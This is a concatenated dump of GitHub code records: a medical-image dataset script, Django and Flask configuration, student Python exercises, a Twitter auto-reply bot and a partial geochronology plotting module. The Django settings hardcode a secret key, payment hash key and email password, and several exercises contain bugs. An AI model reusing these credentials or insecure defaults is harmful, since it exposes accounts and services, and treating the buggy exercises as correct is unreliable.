normalize(image_scaled)\n\t\ttest_label[i] = 1\n\t\ti += 1\n\t\tif i == 50000:\n\t\t\tbreak\n\n\ttry:\n\t\tos.mkdir('OralCancer-Scale/')\n\texcept:\n\t\tNone\n\n\tos.chdir('OralCancer-Scale/')\n\n\tfor split in range(val_splits):\n\t\trandom.seed(split)\n\t\tperm = np.random.permutation(train_data.shape[0])\n\t\ttrain_data = train_data[perm,:,:]\n\t\ttrain_label = train_label[perm]\n\n\t\tperm = np.random.permutation(test_data.shape[0])\n\t\ttest_data = test_data[perm,:,:]\n\t\ttest_label = test_label[perm]\n\n\t\tdict = {}\n\t\tdict['train_data'] = train_data\n\t\tdict['train_label'] = train_label\n\t\tdict['test_data'] = test_data\n\t\tdict['test_label'] = test_label\n\n\t\tpickle.dump(dict,open('oral_cancer_scale_new_split_'+ str(split) +'.pickle','wb'), protocol=4)\n\n\tos.chdir('..')\n\n\ttry:\n\t\tos.mkdir('OralCancer-Scale-For-Augmentation/')\n\texcept:\n\t\tNone\n\n\tos.chdir('OralCancer-Scale-For-Augmentation/')\n\n\tfor split in range(val_splits):\n\t\trandom.seed(split)\n\t\tperm = np.random.permutation(train_data_scale.shape[0])\n\t\ttrain_data_scale = train_data_scale[perm,:,:]\n\t\ttrain_label_scale = 
train_label_scale[perm]\n\n\t\tdict = {}\n\t\tdict['train_data'] = train_data_scale\n\t\tdict['train_label'] = train_label_scale\n\n\t\tpickle.dump(dict,open('oral_cancer_scale_split_'+ str(split) +'.pickle','wb'), protocol=4)\n\n\tos.chdir('..')\n\n\nif __name__ == '__main__':\n\t# make_oral_cancer(6)\n\tmake_oral_caner_scale(6)\n","repo_name":"wsgdrfz/Scale-invariant-CNNs","sub_path":"src/pytorch/Make_OralCancer.py","file_name":"Make_OralCancer.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"}
+{"seq_id":"34930130413","text":"import psycopg2\n\n\n#connection to \"chinook\" database\nconnection = psycopg2.connect(database=\"chinook\")\n\n#build cursor object of database\ncursor = connection.cursor()\n\n#Query 1 - fetch all records from * Artist * table\ncursor.execute('SELECT * FROM \"Track\" WHERE \"Composer\" = %s', [\"AC/DC\"])\n\n#fetch all results\nresults = cursor.fetchall()\n\n#fetch one result\n# oneresult = cursor.fetchone()\n\n#close the connection\nconnection.close()\n\n#print results\nfor result in results:\n print(result)\n","repo_name":"Jays-T/SQLtesting","sub_path":"sql-psycopg2.py","file_name":"sql-psycopg2.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29240799243","text":"\"\"\"\nDjango settings for asa18 project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'llk5rhxp6^*j^0^!c84u(utby+6^2$-8*+pm6i36fn(n#^5d$*'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['127.0.0.1', '0.0.0.0']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'captcha',\n 'tinymce',\n 'sorl.thumbnail',\n 'mce_filebrowser',\n 'colorfield',\n 'asa18',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'OPTIONS' : {\n 'context_processors': [\n \"django.contrib.auth.context_processors.auth\",\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.i18n\",\n \"django.template.context_processors.media\",\n \"django.template.context_processors.static\",\n \"django.template.context_processors.request\",\n \"django.template.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n ]\n }\n },\n]\n# TEMPLATE_CONTEXT_PROCESSORS = (\n# \"django.contrib.auth.context_processors.auth\",\n# \"django.template.context_processors.debug\",\n# \"django.template.context_processors.i18n\",\n# \"django.template.context_processors.media\",\n# \"django.template.context_processors.static\",\n# \"django.template.context_processors.request\",\n# \"django.template.context_processors.tz\",\n# \"django.contrib.messages.context_processors.messages\",\n# )\n\nROOT_URLCONF = 'asa18.urls_dev'\n\nWSGI_APPLICATION = 'asa18.wsgi.application'\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Australia/Sydney'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nAPPEND_SLASH = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n# TinyMCE setup\nTINYMCE_DEFAULT_CONFIG = {\n 'theme' : 'advanced',\n 'relative_urls': 
False,\n 'file_browser_callback': 'mce_filebrowser',\n 'resize': True,\n 'theme_advanced_resizing': True,\n 'width': 600,\n 'height': 600,\n}\n\n# DJANGO_COUNTRIES SETUP\nCOUNTRIES_FIRST = [\"AUS\", \"NZ\", ]\n\n# OneStop config\nONESTOP_TRAN_TYPE = '483'\nONESTOP_GLCODE = 'R.35250.ASA.9280'\nONESTOP_STOREID = 'ASA2017'\nONESTOP_PAYMENT_URL = 'fake.test.payment/'\nONESTOP_SECRET_HASH = 'rwar'\nONESTOP_SECRET_HASH_KEY = 'rxCgXTtcHG5uy34r'\n\n# Mail settings\nEMAIL_HOST = 'mso.anu.edu.au'\nEMAIL_PORT = 465\nEMAIL_HOST_USER = 'skymap'\nEMAIL_HOST_PASSWORD = 'Blu8*1=1'\n# EMAIL_USE_SSL = True\nEMAIL_USE_TLS = False\nEMAIL_USE_SSL = True\nREGISTRATION_EMAIL = 'ASA2018@astro.swin.edu.au'\n\n# Page display parameters\nGLOBAL_PAGE_TITLE = \"ASA 2018\"\n","repo_name":"Samreay/ASA2018_django","sub_path":"asa18/settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70679380034","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request, render_template\n\nfrom trifle.server.views import *\n\n__all__ = ['create_app']\n\nDEFAULT_BLUEPRINTS = [\n api,\n frontend,\n monitor,\n configure\n]\n\ndef create_app(config=None, app_name=None, blueprints=None):\n \"\"\"Create a Flask app.\"\"\"\n\n if app_name is None:\n app_name = \"Trifle\"\n if blueprints is None:\n blueprints = DEFAULT_BLUEPRINTS\n\n app = Flask(app_name,\n #instance_path=INSTANCE_FOLDER_PATH, \n\t instance_relative_config=True)\n\n configure_app(app, config)\n configure_hook(app)\n configure_blueprints(app, blueprints)\n return app\n\n\ndef configure_app(app, config=None):\n \"\"\"Different ways of configurations.\"\"\"\n\n # http://flask.pocoo.org/docs/api/#configuration\n #app.config.from_object(DefaultConfig)\n\n # http://flask.pocoo.org/docs/config/#instance-folders\n #app.config.from_pyfile('production.cfg', silent=True)\n\n if config:\n app.config.from_object(config)\n\n app.root_path = os.path.abspath(os.path.dirname(__file__))\n app.static_folder = 'static'\n app.templates_folder = 'templates'\n app.secret_key = 'A0Zr98j/3&oaKoaygXfAZsdER~?aijmN]LWX/,?RT'\n\n # Use instance folder instead of env variables to make deployment easier.\n #app.config.from_envvar('%s_APP_CONFIG' % DefaultConfig.PROJECT.upper(), silent=True)\n\n\ndef configure_hook(app):\n \"\"\" Configure the application hooks \"\"\"\n @app.before_request\n def before_request():\n pass\n\n\ndef configure_blueprints(app, blueprints):\n \"\"\"Configure blueprints in views.\"\"\"\n\n for blueprint in blueprints:\n app.register_blueprint(blueprint)\n\n","repo_name":"gloaec/trifle","sub_path":"src/trifle/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39542442073","text":"# 8. Write a Python program to append a list to the second list.\n# consider l1 is [1, 2, 3, 4, 5] and l2 is []\n# using loop add items of l1 in l2\n\nl1 = [1, 2, 3, 4, 5]\nl2 = []\n\nfor i in l1:\n l2.append(i)\n\nprint(l2)","repo_name":"muhammadhuzaifakhan1133/python-backend-assignments","sub_path":"assignment3/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40862363135","text":"#! python3\r\n\r\n#This will be a twitter bot trial and error - may evolve into something more useful.\r\n\r\nimport tweepy, time, os\r\nfrom random import randint\r\n\r\nauth = tweepy.OAuthHandler(os.environ[\"CONSUMER_KEY\"], os.environ[\"CONSUMER_SECRET\"])\r\nauth.set_access_token(os.environ[\"ACCESS_KEY\"], os.environ[\"ACCESS_SECRET\"])\r\n\r\napi = tweepy.API(auth)\r\n\r\nuser_id = \"Chris Kansas\"\r\n\r\nresponses = [\"Spiderman?! What has that creep been up to?\",\r\n\"Spiderman?!?!? Get me some pictures now!\",\r\n\"What a menace to society!\",\r\n\"Why wear a mask? Why doesn't he show his face?\",\r\n\"Spider-Man, Hero or Menace? Exclusive Daily Bugle Photos.\"]\r\n\r\n#api.update_status(\"#HelloWorld - This is JonahBot's first tweet!\")\r\nclass MyStreamListener(tweepy.StreamListener):\r\n\r\n def on_status(self, status):\r\n #print(status.text)\r\n print(status.user.screen_name)\r\n api.update_status(\"@\" + status.user.screen_name + \" \" + responses[randint(0, 4)])\r\n\r\nmyStreamListener = MyStreamListener()\r\nmyStream = tweepy.Stream(auth = api.auth, listener=myStreamListener)\r\n\r\nmyStream.filter(follow=[\"348260063\"], track = [\"#spiderman\"]) #This will track a specific user by user_id and it will track anytime someone tweets \"spiderman\"\r\n\r\n#for follower in tweepy.Cursor(api.followers).items():\r\n #follower.follow()\r\n #print(follower.screen_name)\r\n\r\n#for i in range(5):\r\n #random_number = randint(0, 100)\r\n #api.update_status(\"%s is my favorite number right now.\" % (random_number))\r\n #time.sleep(20)\r\n","repo_name":"ColoradoChris/TwitterBot","sub_path":"bot1.py","file_name":"bot1.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36432062319","text":"#!/usr/bin/python3\n\"\"\"module 12-pascal_triangle\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"returns a pascal's triangle\"\"\"\n if n <= 0:\n return []\n else:\n triangle = []\n for row in range(n):\n current_row = []\n for col in range(row + 1):\n if col == 0 or col == row:\n current_row.append(1)\n else:\n value = triangle[row - 1][col - 1] + triangle[row - 1][col]\n current_row.append(value)\n triangle.append(current_row)\n return triangle\n","repo_name":"Mitchkal/alx-higher_level_programming","sub_path":"0x0B-python-input_output/12-pascal_triangle.py","file_name":"12-pascal_triangle.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43941587305","text":"#ques1\r\nr=[]\r\nfor i in range(2000,3201):\r\n if (i%7==0 and i%5!=0):\r\n r.append(i)\r\nprint(r)\r\n\r\n#ques2\r\nresult=dict()\r\nn=int(input(\"Enter number\"))\r\nfor i in range(1,n+1):\r\n result.update({i:i*i})\r\nprint(result)\r\n\r\n#ques3\r\nnum=int(input(\"enter number\"))\r\nfact=1\r\nfor i in range(n):\r\n fact=fact*(i+1)\r\nprint(\"factorial of number is\",fact)\r\n\r\n#ques4\r\n#(i)\r\na=[5,7,9,3,2,1,4,2,6,3,0,9,8]\r\nfor i in a:\r\n if(a[i]<5):\r\n print(a[i])\r\n\r\n#(ii)\r\nb=[] \r\nfor j in a:\r\n if(a[j]<5):\r\n b.append(a[j])\r\nprint(b)\r\n#(iv)\r\nno=input(\"enter number\")\r\nif no in a:\r\n print(\"element is present in list\")\r\nelse:\r\n print(\"element not in list\")\r\n\r\n#ques 5\r\nline=input(\"enter line\")\r\nprint(line.upper())\r\n\r\n#ques7\r\nstring=input(\"enter string\")\r\nstring=string.split(\" \")\r\nrevstring=string[: :-1]\r\nprint(revstring)\r\n\r\n#ques8\r\nfor i in range(1,5):\r\n print(end=\"\\n\")\r\n for k in range(1,2*i):\r\n if(k>=i):\r\n print(k,end=' ')\r\n#ques9\r\nclass Circle:\r\n def __init__(self,radius):\r\n self.radius=radius\r\n def area(self):\r\n self.area=(3.14*(self.radius)**2)\r\n print(self.area)\r\ny=int(input(\"enter radius\"))\r\nob=Circle(y)\r\nob.area()\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n \r\n \r\n","repo_name":"showYourMeYourCodeDSC/TEST","sub_path":"divya_assisn1.py","file_name":"divya_assisn1.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27211441660","text":"N = int(input())\ndigit = [(i, 0) for i in range(36)]\n\nfor i in range(N):\n number = input()\n for n in range(len(number)-1, -1, -1):\n tmp = number[n]\n if ord(tmp) >= ord('0') and ord(tmp) <= ord('9'):\n tmp = int(tmp)\n else:\n tmp = ord(tmp) - ord('A') + 10\n \n digit[tmp] = (tmp, digit[tmp][1] + pow(36, len(number)-1-n))\n\nK = int(input())\n\ncheck = []\nfor i in range(36):\n check.append((digit[i][1]*(35-i), i))\n\ncheck.sort(reverse=True)\n\nfor i in range(K):\n digit[check[i][1]] = (35, digit[check[i][1]][1])\n\nsum35 = 0\nfor i in range(36):\n sum35 += digit[i][0] * digit[i][1]\n\ndef to36(n):\n if n < 36:\n if n >= 0 and n <= 9:\n print(n, end='')\n else:\n print(chr(ord('A')+n-10), end='')\n return\n\n to36(n//36)\n if n%36 >= 0 and n%36 <= 9:\n print(n%36, end='')\n else:\n print(chr(ord('A')+n%36-10), end='')\n\nto36(sum35)","repo_name":"b-chae/AlgorithmStudy","sub_path":"baekjoon/그리디/1036.py","file_name":"1036.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11637070710","text":"import re\nnum = int(input())\n\nfor _ in range(num):\n message = input()\n pattern = r\"(\\|[A-Z]{4,}\\|):(#[A-Za-z]+\\s[A-Za-z]+#)\"\n result = re.findall(pattern, message)\n if result:\n name = result[0][0][1:-1]\n title = result[0][1][1:-1]\n\n print(f\"{name}, The {title}\")\n print(f\">> Strength: {len(name)}\")\n print(f\">> Armor: {len(title)}\")\n\n else:\n print(\"Access denied!\")\n","repo_name":"ahmedbuchev/SoftUni-Python","sub_path":"01.Fundamentals/12.final_exam/boss_rush.py","file_name":"boss_rush.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23548336971","text":"T = int(input())\r\ncombos = {}\r\nimport sys\r\nsys.setrecursionlimit(5000)\r\ndef flipping(origFaces, s):\r\n minFlips = 0\r\n faces = list(origFaces)\r\n #print(faces)\r\n if tuple([tuple(origFaces),s]) in combos:\r\n minFlips = combos[tuple([tuple(origFaces),s])]\r\n elif faces == list(\"+\"*s):\r\n minFlips = 0\r\n elif faces == list(\"-\"*s):\r\n minFlips = 1\r\n else:\r\n if len(faces) >= s:\r\n if faces[0] == \"+\":\r\n curFlips = flipping(faces[1:], s)\r\n if curFlips != -1:\r\n minFlips = curFlips\r\n else:\r\n minFlips = -1\r\n else:\r\n for y in range(s):\r\n if faces[y] == \"+\":\r\n faces[y] = \"-\"\r\n else:\r\n faces[y] = \"+\"\r\n curFlips = flipping(faces[1:], s)\r\n if curFlips != -1:\r\n minFlips = curFlips + 1\r\n else:\r\n minFlips = -1\r\n else:\r\n minFlips = -1\r\n combos[tuple([tuple(origFaces),s])] = minFlips\r\n return minFlips\r\nfor x in range(T):\r\n pancakes, s = list(raw_input().split(\" \"))\r\n pancakes = list(pancakes)\r\n s = int(s)\r\n theFlips = str(flipping(pancakes, s))\r\n if theFlips != \"-1\":\r\n print(\"Case #\"+str(x+1)+\": \"+theFlips)\r\n else:\r\n print(\"Case #\"+str(x+1)+\": IMPOSSIBLE\")\r\n#print(combos)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/478.py","file_name":"478.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30266313388","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport FFT.FFT as myfft\nimport Devices.Devices as dev\n\n\ndef simulate_sine(freq, amp):\n N = 10000\n T = 1.0 / 800\n\n omega = freq * 2.0 * np.pi\n x = np.linspace(0.0, N * T, N)\n y = amp * np.sin(omega * x)\n return y\n\n\noscilloscope = dev.Oscilloscope('123')\ngenerator = dev.Generator('321')\nfreq, amp = myfft.get_spectrum(simulate_sine(2000, 3))\nplt.plot(freq, amp)\nplt.show()\n","repo_name":"Mr-DarkTesla/FourieAutomation","sub_path":"Process/Process_test_fft.py","file_name":"Process_test_fft.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36483384829","text":"\"\"\"\nConcordia plotting routines for (dis)equilibrium U-Pb datasets.\n\n\"\"\"\n\nimport warnings\nimport numpy as np\n\nfrom scipy import integrate\nfrom scipy import optimize\n\nfrom . import plotting, ludwig\nfrom . import cfg\nfrom . import misc\nfrom . import useries\nfrom . import stats\nfrom .exceptions import ConvergenceError\n\n\nexp = np.exp\n\n\n#=================================\n# Concordia plotting routines\n#=================================\n\ndef plot_concordia(ax, diagram='tw', point_markers=True, age_ellipses=False,\n env=False, marker_max=None, marker_ages=(), auto_markers=True,\n remove_overlaps=True, age_prefix='Ma'):\n \"\"\"\n Plot disequilibrium U-Pb concordia curve on concordia diagram.\n\n Parameters\n ----------\n ax : matplotlib.pyplot.Axes\n Axes object to plot concordia curve in.\n diagram : {'tw', 'wc'}\n Concordia diagram type.\n point_markers : bool, optional\n If True, plot concordia regular single point age markers.\n age_ellipses : bool, optional\n If True plot concordia age ellipse markers that represent effects\n of decay constant uncertainties.\n env : bool, optional\n If True, plot concordia uncertainty envelope showing effects of\n decay constant uncertainties on trajectory of concordia curve.\n marker_max : float, optional\n User specified age marker max (Ma).\n marker_ages : array-like, optional\n List of user defined age marker locations (in same units as age_prefix).\n auto_markers : bool, optional\n If True, this function will attempt to find the most suitable\n concordia age marker locations.\n remove_overlaps : bool, optional\n If True, this function will remove first overlapping concordia age\n marker and all older labels.\n\n Raises\n -------\n UserWarning: if concordia lies entirely outside the axis limits.\n\n \"\"\"\n assert diagram in ('tw', 'wc'), \"diagram must be 'wc' (Wetheril) or 'tw' (Tera-Wasserburg)\"\n assert ax.get_xlim()[1] > ax.get_xlim()[0], 'x-axis limits must be in ascending order'\n assert ax.get_ylim()[1] > ax.get_ylim()[0], 'y-axis limits must be in ascending order'\n\n ax.autoscale(enable=False, axis='both') # freeze axis limits\n\n # ...\n tbounds = cfg.conc_age_bounds\n if auto_markers and (marker_max is not None):\n if not marker_max > tbounds[0]:\n raise ValueError('marker_max value must be greater than the lower '\n 'conc_age_bound value')\n\n code, tlim = eq_age_limits(ax, diagram=diagram, tlim=(0.001, 4600.))\n if code == 1:\n warnings.warn('concordia appears to lie entirely outside axis limits')\n return\n\n # get equally spaced points\n ct, cx, cy = eq_equi_points(*tlim, ax.get_xlim(), ax.get_ylim(),\n diagram, ngp=500_000, n=100)\n # plot line\n ax.plot(cx, cy, **cfg.conc_line_kw, label='concordia line')\n # plot envelope\n if env:\n plot_envelope(ax, diagram, xc=cx)\n if point_markers or age_ellipses:\n if auto_markers and (marker_max is not None) and (marker_max < tlim[1]):\n tlim[1] = marker_max\n if marker_max < tlim[0]:\n warnings.warn('marker_max age is less than auto lower limit '\n '- no markers to plot')\n return\n markers_dict = generate_age_markers(ax, *tlim, tbounds, diagram,\n auto=auto_markers, marker_ages=marker_ages,\n ell=age_ellipses, age_prefix=age_prefix,\n point_markers=point_markers)\n markers_dict = plot_age_markers(ax, markers_dict)\n\n # label markers\n if cfg.individualised_labels:\n individualised_labels(ax, markers_dict, diagram,\n remove_overlaps=remove_overlaps)\n else:\n labels(ax, markers_dict)\n\n\ndef plot_diseq_concordia(ax, A, meas, 
sA=None, diagram='tw', env=False,\n point_markers=True, age_ellipses=False, marker_max=None,\n marker_ages=(), auto_markers=True, remove_overlaps=True,\n age_prefix='Ma', spaghetti=False):\n \"\"\"\n Plot disequilibrium U-Pb concordia curve on concordia diagram.\n\n Parameters\n ----------\n ax : matplotlib.pyplot.Axes\n Axes object to plot concordia curve in.\n A : array-like\n one-dimensional array of activity ratio values arranged as follows\n - [234U/238U], [230Th/238U], [226Ra/238U], [231Pa/235U]\n meas : array-like\n two-element list of boolean values, the first is True if [234U/238U]\n is a present-day value and False if an initial value, the second is True\n if [230Th/238U] is an present-day value and False if an initial value\n sA : array-like, optional\n one-dimensional array of activity ratio value uncertainties given\n as 1 sigma absolute and arranged in the same order as A\n diagram : {'tw', 'wc'}\n Concordia diagram type.\n point_markers : bool, optional\n If True, plot concordia regular single point age markers.\n age_ellipses : bool, optional\n If True plot concordia age ellipse markers that represent effects\n of decay constant uncertainties.\n env : bool, optional\n If True, plot concordia uncertainty envelope showing effects of\n decay constant uncertainties on trajectory of concordia curve.\n marker_max : float, optional\n User specified age marker max (Ma).\n marker_ages : array-like, optional\n List of user defined age marker locations (in same units as age_prefix).\n auto_markers : bool, optional\n If True, this function will attempt to find the most suitable\n concordia age marker locations.\n remove_overlaps : bool, optional\n If True, this function will remove first overlapping concordia age\n marker and all older labels.\n spaghetti : bool\n Plot each simulated line using arbitrary colours (no longer used).\n\n Raises\n -------\n UserWarning: if concordia lies entirely outside the axis limits.\n\n \"\"\"\n assert diagram == 'tw', 'Wetheril concordia not yet implemented'\n assert ax.get_xlim()[1] > ax.get_xlim()[0], 'x-axis limits must be in ascending order'\n assert ax.get_ylim()[1] > ax.get_ylim()[0], 'y-axis limits must be in ascending order'\n if env or age_ellipses:\n assert sA is not None, 'sA must be given to plot concordia envelope or age ellipses'\n\n ax.autoscale(enable=False, axis='both') # freeze axis limits\n\n # Get hard age limits.\n if meas[1]:\n tbounds = cfg.diseq_conc_age_bounds[2]\n elif meas[0]:\n tbounds = cfg.diseq_conc_age_bounds[1]\n else:\n tbounds = cfg.diseq_conc_age_bounds[0]\n\n if auto_markers and (marker_max is not None):\n if not marker_max > tbounds[0]:\n raise ValueError('marker_max value must be greater than the lower '\n 'conc_age_bound value')\n\n code, tlim, tbounds = diseq_age_limits(ax, A, meas, diagram='tw', tbounds=tbounds,\n max_age=marker_max)\n if code == 1:\n warnings.warn('concordia appears to lie entirely outside axis limits')\n return\n\n # get equally spaced points\n ct, cx, cy = diseq_equi_points(*tlim, ax.get_xlim(), ax.get_ylim(), A, meas,\n diagram, ngp=500_000, n=100)\n # plot line\n ax.plot(cx, cy, **cfg.conc_line_kw, label='concordia line')\n\n # Check if activity ratios are resolvable from equilibrium. 
Do not plot\n # envelope or ellipses if not.\n # Check measured activity ratios.\n if env or age_ellipses:\n if meas[0]:\n p = stats.two_sample_p(A[0], sA[0], cfg.a234_238_eq, cfg.a234_238_eq_1s)\n if p > 0.05:\n warnings.warn(f'cannot plot concordia envelope or age ellipses if '\n f'[234U/238U] is not sufficiently resolved from equilibrium')\n env, age_ellipses = False, False\n if meas[1]:\n p = stats.two_sample_p(A[0], sA[0], cfg.a234_238_eq, cfg.a234_238_eq_1s)\n if p > 0.05:\n warnings.warn(f'cannot plot concordia envelope or age ellipses if '\n f'[230Th/238U] is not sufficiently resolved from equilibrium')\n env, age_ellipses = False, False\n\n # plot envelope\n pA = None\n if env:\n pA = plot_diseq_envelope(ax, ct, cx, cy, *tlim, tbounds, A, sA, meas,\n diagram='tw', trials=10_000, spaghetti=False)\n if point_markers or age_ellipses:\n if auto_markers and (marker_max is not None) and (marker_max < tlim[1]):\n tlim[1] = marker_max\n if marker_max < tlim[0]:\n warnings.warn('marker_max age is less than auto lower limit '\n '- no markers to plot')\n return\n if age_ellipses and (sA is None or all([x == 0 for x in sA])):\n warnings.warn('cannot plot disequilibrium concordia age ellipses if no '\n 'uncertainity assigned to activity ratios')\n if not point_markers:\n return\n age_ellipses = False\n markers_dict = generate_age_markers(ax, *tlim, tbounds, diagram,\n A=A, sA=sA, meas=meas, auto=auto_markers,\n marker_ages=marker_ages, eq=False,\n ell=age_ellipses, age_prefix=age_prefix,\n point_markers=point_markers)\n markers_dict = plot_age_markers(ax, markers_dict, pA=pA)\n\n # label markers\n if cfg.individualised_labels:\n individualised_labels(ax, markers_dict, diagram,\n remove_overlaps=remove_overlaps)\n else:\n labels(ax, markers_dict)\n\n\n#==============================================================================\n# Eq concordia functions\n#==============================================================================\n\ndef eq_xy(t, diagram):\n \"\"\"\n Return x, y for given t along (equilibrium) concordia curve.\n \"\"\"\n assert diagram in ('tw', 'wc')\n if diagram == 'tw':\n x = 1. / (exp(cfg.lam238 * t) - 1.)\n y = (1. / cfg.U) * (exp(cfg.lam235 * t) - 1.) / (exp(cfg.lam238 * t) - 1.)\n elif diagram == 'wc':\n y = exp(cfg.lam238 * t) - 1.\n x = exp(cfg.lam235 * t) - 1.\n return x, y\n\n\ndef eq_age_x(x, diagram):\n \"\"\"\n Age of point on concordia at given x value.\n \"\"\"\n assert diagram in ('tw', 'wc')\n if diagram == 'wc':\n t = 1. / cfg.lam235 * np.log(1. + x)\n else:\n t = 1. / cfg.lam238 * np.log(1. + 1. / x)\n return t\n\n\ndef eq_slope(t, diagram):\n \"\"\"\n Compute tangent to concordia at given t. I.e. dy/dx for given t.\n \"\"\"\n assert diagram in ('tw', 'wc')\n lam238, lam235, U = cfg.lam238, cfg.lam235, cfg.U\n if diagram == 'wc':\n return lam238 / lam235 * exp((lam238 - lam235) * t)\n elif diagram == 'tw':\n den = (exp(lam238 * t) - 1.)\n dx = -lam238 * exp(lam238 * t) / den ** 2\n dy = lam235 * exp(lam235 * t) / (U * den) - (lam238 *\n exp(lam238 * t) * (exp(lam235 * t) - 1.)) / (U * den ** 2)\n return dy / dx\n\n\ndef eq_age_ellipse(t, diagram):\n \"\"\"\n Age ellipse params for displaying effects of decay constant\n errors on equilibrium concordia age markers. 
Requires computing uncertainty\n in x and y for a given t value using first-order error propagation.\n \"\"\"\n assert diagram in ('tw', 'wc')\n lam238, lam235, s238, s235 = cfg.lam238, cfg.lam235, cfg.s238, cfg.s235\n if diagram == 'wc':\n sx = t * exp(lam235 * t) * s235\n sy = t * exp(lam238 * t) * s238\n cov_xy = 0. * t # float or array of zeros\n else:\n x, y = eq_xy(t, diagram)\n sx = - x ** 2 * t * exp(lam238 * t) * s238\n sy = x * t * np.sqrt((exp(lam235 * t) * s235 / cfg.U) ** 2 + (\n (y * exp(lam238 * t) * s238) ** 2))\n cov_xy = x ** 3 * y * (t * exp(lam238 * t) * s238) ** 2\n r_xy = cov_xy / (sx * sy)\n return sx, sy, r_xy\n\n\ndef eq_envelope(x, diagram):\n \"\"\"\n Uncertainty in y for a given x value along the concordia to\n display the effects of decay constant errors on trajectory of the concordia\n curve. Requires computing uncertainty in y for a given x value using\n first-order error propagation.\n \"\"\"\n assert diagram in ('tw', 'wc')\n lam238, lam235, s238, s235 = cfg.lam238, cfg.lam235, cfg.s238, cfg.s235\n t = eq_age_x(x, diagram)\n if diagram == 'wc':\n sy = t * exp(lam238 * t) * np.sqrt(s238 ** 2\n + (lam238 / lam235 * s235) ** 2)\n else:\n sy = x * t * exp(lam235 * t) / cfg.U * np.sqrt(s235 ** 2\n + (lam235 / lam238 * s238) ** 2)\n return sy\n\n\ndef eq_velocity(t, xlim, ylim, diagram):\n \"\"\"\n Estimate dr/dt, which is \"eq_velocity\" along an equilibrium concordia curve in\n x-y space. Uses axis coordinates to circumvent scaling issues.\n \"\"\"\n # TODO: this could be calculated analytically for eq case ??\n h = 1e-08 * t\n xspan = xlim[1] - xlim[0]\n yspan = ylim[1] - ylim[0]\n x2, y2 = eq_xy(t + h, diagram)\n x1, y1 = eq_xy(t - h, diagram)\n v = 